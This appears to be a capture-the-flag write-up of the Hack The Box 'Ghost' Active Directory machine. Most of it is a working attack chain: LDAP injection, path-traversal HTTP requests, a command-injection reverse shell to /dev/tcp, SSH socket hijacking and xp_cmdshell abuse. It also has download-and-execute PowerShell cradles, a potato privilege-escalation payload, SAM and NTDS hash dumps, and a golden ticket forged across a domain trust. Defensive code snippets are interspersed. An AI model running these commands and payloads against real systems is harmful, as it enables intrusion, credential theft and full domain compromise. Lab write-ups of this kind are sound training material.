| Machine IP |
|---|
| 10.129.238.42 |

Enumeration 10.129.238.42
Nmap scan
rustscan -a 10.129.238.42 -u 5000 -- -sC -sV -Pn -oA 10.129.238.42
| Port | Service | Version |
|---|---|---|
| 53 | domain | syn-ack ttl 127 Simple DNS Plus |
| 80 | http | syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 |
| 88 | kerberos-sec | syn-ack ttl 127 Microsoft Windows Kerberos |
| 135 | msrpc | syn-ack ttl 127 Microsoft Windows RPC |
| 139 | netbios-ssn | syn-ack ttl 127 Microsoft Windows netbios-ssn |
| 443 | https? | syn-ack ttl 127 federation.ghost.htb (ADFS) |
| 445 | microsoft-ds? | syn-ack ttl 127 |
| 464 | kpasswd5? | syn-ack ttl 127 |
| 593 | ncacn_http | syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 |
| 636 | ssl/ldap | syn-ack ttl 127 Microsoft Windows Active Directory LDAP |
| 1433 | ms-sql-s | syn-ack ttl 127 Microsoft SQL Server 2022 16.00.1000.00; RC0+ |
| 2179 | vmrdp? | syn-ack ttl 127 |
| 3268 | ldap | syn-ack ttl 127 Microsoft Windows Active Directory LDAP |
| 3269 | ssl/ldap | syn-ack ttl 127 Microsoft Windows Active Directory LDAP |
| 3389 | ms-wbt-server | syn-ack ttl 127 Microsoft Terminal Services - Issuer: commonName=DC01.ghost.htb - Signature Algorithm: sha256WithRSAEncryption - MD5: 7e9a:4e05:78e6:8e7a:ef13:1712:94cf:6279 - DNS_Computer_Name: DC01.ghost.htb - NetBIOS_Domain_Name: GHOST - ssl-cert: Subject: commonName=DC01.ghost.htb - NetBIOS_Computer_Name: DC01 - Not valid before: 2024-06-16T15:49:55 - Not valid after: 2024-12-16T15:49:55 - DNS_Tree_Name: ghost.htb - DNS_Domain_Name: ghost.htb - rdp-ntlm-info: - SHA-1: a19b:426c:3d83:7ff2:b680:93f4:f574:843a:99d0:bb8a - Public Key bits: 2048 - Public Key type: rsa - Target_Name: GHOST - Product_Version: 10.0.20348 |
| 5985 | http | syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 |
| 8008 | http | syn-ack ttl 127 nginx 1.18.0 Ghost 5.78 _/ghost/ /p/ /email/ /r/ /web/mentions/receive |
| 8443 | ssl/http | syn-ack ttl 127 nginx 1.18.0 core.ghost.htb /login |
| 49443 | unknown | syn-ack ttl 127 |
| 49664 | msrpc | syn-ack ttl 127 Microsoft Windows RPC |
| 49669 | msrpc | syn-ack ttl 127 Microsoft Windows RPC |
| 49671 | ncacn_http | syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 |
| 63593 | msrpc | syn-ack ttl 127 Microsoft Windows RPC |
| 64783 | msrpc | syn-ack ttl 127 Microsoft Windows RPC |
| 64826 | msrpc | syn-ack ttl 127 Microsoft Windows RPC |
Based on the nmap results we found the following useful information:
- Port 8443 hosts core.ghost.htb, which has a /login page
- Port 8008 runs Ghost 5.78 behind nginx 1.18.0; nmap lists five paths: _/ghost/ /p/ /email/ /r/ /web/mentions/receive
- What is port 2179? (nmap labels it vmrdp?)
- The host is the domain controller DC01.ghost.htb for the domain ghost.htb
- Port 1433 runs SQL Server 2022 RC0+
- Port 3389 (Terminal Services) is also open
- Port 5985 is also open.
Now we add these hostnames to the /etc/hosts file.
Port 8443

The /login page has a link (href) to /api/login.
The /api/login endpoint redirects us to
https://federation.ghost.htb/adfs/ls/?SAMLRequest=nVPBcpswEP0VRneDwCQ2GuOMiw%2F1TJowNu2hl44sVjEzIFHtkjh%2FnwGbxIfWB1%2F1dt%2B%2Bffu0eDg2tfcKDitrUhb6nD0sFyibuhWrjg5mC387QPKOTW1QDEDKOmeElVihMLIBFKTEbvXjUUQ%2BF62zZJWtmbdZp%2BxPFM91HIfynut4n6g4KSMt94nWKknCmZ5CxO%2FmnGvm%2FRpFRD5n3gaxg41BkoZSFvEonvDZJLwrwlDwmYju%2FSkPfzMvP4%2F7VpmyMi%2FXte1PRSi%2BF0U%2ByZ93BfPWgFQZScPoA1GLIgg0lOCGN%2F%2FlYJH8A%2B0DWWoMagyYt0IE16OZNdg14HbgXisFP7ePXxzKOvjqFvM4np4oehOD1iJtAVtrENjJcTHs7C6svr6NHFWw5ZWZi%2BCCezztk2xgs85tXan3W067qmv7ljmQBCkj1wELRupzYKAc4pNZQ3C8KT6ZbVrpKuzvAkepaLTpkjirJeIW9C2mXS1TQvXUgCKXiG%2FWlX3SQBGUhZMGW%2BvobO2%2F9CxP2H%2Fs%2BEQvv9jyAw%3D%3D&SigAlg=http%3A%2F%2Fwww.w3.org%2F2001%2F04%2Fxmldsig-more%23rsa-sha256&Signature=YKbzuj2bhlsQOKybpQqOnhEi4OuQ0w%2BQUCvoWCmApSqGDAkpUh5gLYocD2oyTO%2Ftn2NO4P2RDa%2FMChq5PLcwO69oXoGgOeQ7kpVFv6vNa6xad5xi8RSP4GHXB29C1piQJ3Tj1JSS4fSqckKj1WrHpFMkb4WlT62EhSTFdRDZ9%2FQHZPYlH%2BXlSTQtdujH2vwaR53w3jWTke1ID%2B6ey%2FRkRXbzy3XwaCWjf0ACEVZcqpJeQy4VDUNdkkQVrcI0sPgEKYyMpDWw7P6PyutO6D41t4%2BxLlAmmzBcqj3rDW3keshIG42sCgWP8CEt%2FABiGIaGtC51Q%2BB4lVeaioXI5%2FgMMA%3D%3D
So we have a new subdomain: federation.ghost.htb on port 443 (the ADFS endpoint seen in the nmap output).
It takes us to this page.

So most probably, once we log in, we get a certificate and then we can log in.
Port 8008

New subdomain: intranet.ghost.htb

Secret tokens recovered after LDAP injection with brute.py:
fgevlfymxrksvu9b
szrr8kpc3z6onlqf
gitea_temp_principal
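The LDAP injection above works because the token the application compared was interpolated into a search filter unescaped. As an added example (not code from the writeup or from the target application), here is the RFC 4515 escaping such a lookup needs, with the vulnerable string-building pattern beside the hardened one; `secretToken` is a placeholder attribute name, since the page does not say which attribute held the token:

```python
# Added example, not the application's code. Attribute name `secretToken` is a
# constructed placeholder: the page does not say which attribute held the token.

# RFC 4515 section 3: characters that must be escaped inside a filter value.
_LDAP_FILTER_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",    # wildcard; left unescaped it turns an equality match into a pattern match
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def escape_ldap_filter_value(value: str) -> str:
    """Escape one assertion value so it can only ever be compared literally."""
    return "".join(_LDAP_FILTER_ESCAPES.get(ch, ch) for ch in value)


def build_login_filter_unsafe(username: str, token: str) -> str:
    """Vulnerable pattern: raw interpolation. A token containing '*' is treated
    as a wildcard instead of a literal, so the filter no longer verifies the secret."""
    return f"(&(sAMAccountName={username})(secretToken={token}))"


def build_login_filter(username: str, token: str) -> str:
    """Hardened pattern: every user-supplied value is escaped before interpolation."""
    return (
        f"(&(sAMAccountName={escape_ldap_filter_value(username)})"
        f"(secretToken={escape_ldap_filter_value(token)}))"
    )


def is_exact_match_filter(ldap_filter: str) -> bool:
    """Guard for code paths that must never run a wildcard search: true only if
    no unescaped '*' remains in the assembled filter."""
    return "*" not in ldap_filter
```

With the escaped builder, a submitted `*` reaches the directory as the literal three bytes `\2a`, so the only way the filter matches is with the exact token value; a client library such as ldap3 offers an equivalent escape helper, but the rule is the same whichever library assembles the filter.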
Path traversal through the `extra` parameter of the Ghost content API, reading the Ghost database:

```http
GET /ghost/api/content/posts/?key=a5af628828958c976a3b6cc81a&extra=..%2f..%2f..%2f..%2f..%2f..%2fvar%2flib%2fghost%2fcontent%2fdata%2fghost.db HTTP/1.1
Host: ghost.htb:8008
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json; charset=UTF-8
X-Ghost-Version: 5.78
App-Pragma: no-cache
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://ghost.htb:8008/ghost/
```

The same traversal against /proc/self/environ leaks the process environment, which contains the dev intranet key used below:

```http
GET /ghost/api/content/posts/?key=a5af628828958c976a3b6cc81a&extra=..%2f..%2f..%2f..%2f..%2f..%2fproc%2fself%2fenviron
```

!@yqr!X2kxmQ.@Xe
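The `extra` parameter above reaches the filesystem with its `..` segments intact. As an added example that is not part of the writeup or of Ghost's code, the following shows the containment check such a parameter needs, plus a detection-side check for the same pattern in request logs; `CONTENT_ROOT` is a constructed directory and the two traversal values in the test are the ones from the requests above:

```python
import os
import re
from typing import Optional
from urllib.parse import unquote

# Added example, not Ghost's code. CONTENT_ROOT is a constructed directory
# standing in for wherever the endpoint is meant to serve files from.
CONTENT_ROOT = "/var/lib/ghost/content/images"

# Raw or single-encoded "../" and "..\" segments; used on the request-log side.
_TRAVERSAL_RE = re.compile(r"\.\.(?:/|\\|%2f|%5c)", re.IGNORECASE)


def resolve_under_root(root: str, user_path: str) -> Optional[str]:
    """Return the absolute path for `user_path` if it stays inside `root`, else None.

    The value is URL-decoded because the requests above send `..%2f`, then
    normalised with realpath so `..`, `.` and symlinks are resolved before the
    containment check. A leading slash is stripped so an absolute value is
    treated as relative to the root rather than replacing it.
    """
    root_real = os.path.realpath(root)
    decoded = unquote(user_path)
    if "\x00" in decoded:
        return None
    candidate = os.path.realpath(os.path.join(root_real, decoded.lstrip("/")))
    try:
        inside = os.path.commonpath([root_real, candidate]) == root_real
    except ValueError:  # paths on different drives (Windows)
        inside = False
    return candidate if inside else None


def looks_like_traversal(raw_query_value: str) -> bool:
    """Detection-side check for the same pattern in an access-log entry.

    Checks the value as logged and after one round of URL decoding, so both
    `..%2f` and a literal `../` are caught.
    """
    return bool(_TRAVERSAL_RE.search(raw_query_value) or _TRAVERSAL_RE.search(unquote(raw_query_value)))
```

The containment check compares resolved paths rather than looking for `..` in the string, so it also rejects symlink escapes and mixed encodings; the regex is the cheap complement for hunting the pattern in nginx access logs, where only the raw request line is available.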
```bash
curl -X POST http://intranet.ghost.htb:8008/api-dev/scan \
  -H "Content-Type: application/json" \
  -H 'X-DEV-INTRANET-KEY: !@yqr!X2kxmQ.@Xe' \
  -d '{
    "url": "id; bash -i >& /dev/tcp/your_ip/4444 0>&1"
  }'
```
JWT_SECRET=*xopkAGbLyg9bK_A

Password for intranet_principal@GHOST.HTB: He!KA9oKVT3rL99j



```bash
#!/bin/bash
# Opens a persistent SSH ControlMaster connection as florence.ramirez before
# starting the intranet app; the control socket it leaves behind is what the
# ssh -S commands below reuse without needing the password again.
mkdir /root/.ssh
mkdir /root/.ssh/controlmaster
printf 'Host *\n ControlMaster auto\n ControlPath ~/.ssh/controlmaster/h:%%p\n ControlPersist yes' > /root/.ssh/config
sshpass -p 'uxLmt*udNc6t3HrF' ssh -o "StrictHostKeyChecking no" florence.ramirez@ghost.htb@dev-workstation exit
exec /app/ghost_intranet
```

ssh -S /root/.ssh/controlmaster/florence.ramirez@ghost.htb@dev-workstation:22 florence.ramirez@dev-workstation
ssh -S /root/.ssh/controlmaster/florence.ramirez@ghost.htb@dev-workstation:22 florence.ramirez@linux-dev-ws01
scp florence.ramirez@LINUX-DEV-WS01:/tmp/krb5cc_50 /path/to/local/directory/
mssqlclient.py 'intranet_principal@10.129.179.211' -windows-auth
uxLmt*udNc6t3HrF
SQL > enum_links
SQL > use_link [PRIMARY]
SQL > use master
SQL > exec_as_login sa
SQL > enable_xp_cmdshell
SQL > xp_cmdshell "whoami"
Sliver payloads generated
EXEC xp_cmdshell 'powershell.exe -ExecutionPolicy Bypass -Command "iwr -Uri ''http://10.10.14.28/amsi64.txt'' -UseBasicParsing | iex"';
Used this one
(New-Object System.Net.WebClient).DownloadString('http://10.10.14.28/new.ps1') | IEX
EXEC xp_cmdshell 'powershell.exe -ExecutionPolicy Bypass -Command "iwr -Uri ''http://10.10.14.28/large1.ps1'' -UseBasicParsing | iex"';
nc -lvnp 1234
./donut -i /home/jay/vulnlab/breach/GodPotato-NET4.exe -a 2 -b 2 -o /tmp/payload.bin -p '-cmd "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -executionpolicy bypass -file c:\windows\tasks\new.ps1"'
execute -o cmd /c "reg save HKLM\system system"
execute -o cmd /c "reg save HKLM\sam sam"
download sam
download system
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee22097ca2d15cf2e2888c3bcb532b2d:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:41515af3ada195029708a53d941ab751:::
PRIMARY$:1000:aad3b435b51404eeaad3b435b51404ee:27f92da5e3d79962020ddebc08ed7d70:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:69eb46aa347a8c68edb99be2725403ab:::
GHOST$:1103:aad3b435b51404eeaad3b435b51404ee:dae1ad83e2af14a379017f244a2f5297:::
[*] Kerberos keys from ntds.dit
Administrator:aes256-cts-hmac-sha1-96:0242571591b83295b401697d5c883b8bcfd118461055040124f769efdeaea318
Administrator:aes128-cts-hmac-sha1-96:71e7ba32b52330913b23e4c6aeb5e6a5
Administrator:des-cbc-md5:313ee9100bea92a8
PRIMARY$:aes256-cts-hmac-sha1-96:7ce9898568e098a1a2c7e432392970c65359950e48a722f8ad56daaacb192791
PRIMARY$:aes128-cts-hmac-sha1-96:5a692a8b12206802d75f68d3ae3b4f0c
PRIMARY$:des-cbc-md5:7954bf5b9773a16d
krbtgt:aes256-cts-hmac-sha1-96:b0eb79f35055af9d61bcbbe8ccae81d98cf63215045f7216ffd1f8e009a75e8d
krbtgt:aes128-cts-hmac-sha1-96:ea18711cfd69feef0c8efba75bca9235
krbtgt:des-cbc-md5:b3e070025110ce1f
GHOST$:aes256-cts-hmac-sha1-96:3db833a897310f160ef3e277be7a6b9236637455a33c5af4c73ded94203d7c0b
GHOST$:aes128-cts-hmac-sha1-96:da9ac6706a5f1b240782fc36ed028917
GHOST$:des-cbc-md5:620d527c97fba726
Parent-child trust
Domain SID obtained through the DC at 10.0.0.10 (pass-the-hash as core.ghost.htb/Administrator):
proxychains -f /etc/proxychains4.conf lookupsid.py core.ghost.htb/Administrator@10.0.0.10 -hashes :41515af3ada195029708a53d941ab751
S-1-5-21-2034262909-2733679486-179904498
Domain SID of ghost.htb (via 10.0.0.254):
lookupsid.py ghost.htb/florence.ramirez@10.0.0.254 -domain-sids
S-1-5-21-4084500788-938703357-3654145966
powershell.exe -ExecutionPolicy Bypass -Command "iwr -Uri ''http://10.10.14.28/large1.ps1'' -UseBasicParsing | iex"
wmiexec.py corp.ghost.htb/Administrator@DC01.ghost.htb -k -no-pass
ticketer.py -aesKey b0eb79f35055af9d61bcbbe8ccae81d98cf63215045f7216ffd1f8e009a75e8d -domain corp.ghost.htb -domain-sid S-1-5-21-2034262909-2733679486-179904498 -extra-sid S-1-5-21-4084500788-938703357-3654145966-519 Administrator
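The golden ticket above carries an extra SID from the parent domain (RID 519, Enterprise Admins) inside a ticket issued for the child. As an added example, not from the writeup or from any Microsoft code, this shows the rule SID filtering applies to SIDs presented across a trust, together with a detection view of what it would have dropped; the two domain SIDs are the ones the writeup recovered with lookupsid.py, and the function names are mine:

```python
from typing import List, Tuple

# Added example: the rule SID filtering (quarantine) applies to a ticket received
# over a trust. The domain SIDs are the two from the lookupsid.py output above;
# the helpers are illustrative and not a Microsoft API.
CHILD_DOMAIN_SID = "S-1-5-21-2034262909-2733679486-179904498"   # queried via 10.0.0.10
PARENT_DOMAIN_SID = "S-1-5-21-4084500788-938703357-3654145966"  # ghost.htb

# RIDs that grant domain- or forest-wide admin rights when they turn up among a
# ticket's extra SIDs. 519 (Enterprise Admins) is the one injected above.
PRIVILEGED_RIDS = {512: "Domain Admins", 518: "Schema Admins", 519: "Enterprise Admins"}


def split_sid(sid: str) -> Tuple[str, int]:
    """Split 'S-1-5-21-a-b-c-RID' into (domain prefix, RID)."""
    prefix, _, rid = sid.rpartition("-")
    return prefix, int(rid)


def sid_filter(trusted_domain_sid: str, presented_sids: List[str]) -> Tuple[List[str], List[str]]:
    """Apply SID filtering to SIDs presented across a trust.

    Only SIDs issued by the trusted domain itself are kept. Anything with another
    prefix, in particular the trusting domain's own groups and well-known SIDs
    (which the trusting DC adds locally anyway), is dropped.
    Returns (kept, dropped).
    """
    kept, dropped = [], []
    for sid in presented_sids:
        prefix, _ = split_sid(sid)
        (kept if prefix == trusted_domain_sid else dropped).append(sid)
    return kept, dropped


def privileged_foreign_sids(trusted_domain_sid: str, presented_sids: List[str]) -> List[str]:
    """Detection view: foreign SIDs that would have granted a privileged group,
    formatted for an alert."""
    _, dropped = sid_filter(trusted_domain_sid, presented_sids)
    alerts = []
    for sid in dropped:
        _, rid = split_sid(sid)
        if rid in PRIVILEGED_RIDS:
            alerts.append(f"{sid} ({PRIVILEGED_RIDS[rid]})")
    return alerts


if __name__ == "__main__":
    presented = [CHILD_DOMAIN_SID + "-500", PARENT_DOMAIN_SID + "-519"]
    kept, dropped = sid_filter(CHILD_DOMAIN_SID, presented)
    print("kept:", kept)
    print("dropped:", dropped)
    print("alerts:", privileged_foreign_sids(CHILD_DOMAIN_SID, presented))
```

Run against the ticket above, the parent-domain `-519` SID is dropped and flagged while the child's own SIDs pass. Microsoft treats the forest, not the domain, as the security boundary, so within one forest this rule is best read as a detection aid: a compromised child domain is handled as a compromised forest.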